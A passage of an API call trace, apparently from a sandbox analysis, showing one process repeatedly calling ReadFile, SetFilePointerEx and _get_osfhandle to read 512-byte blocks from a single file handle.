(in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.150] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.150] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.151] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.151] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.151] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.152] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.152] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.152] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.153] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.153] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.153] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.154] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.154] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.154] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.155] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.155] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.155] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.156] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.156] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.156] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.157] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.157] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.157] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.158] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.158] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.158] _get_osfhandle (_FileHandle=4) returned 0x54 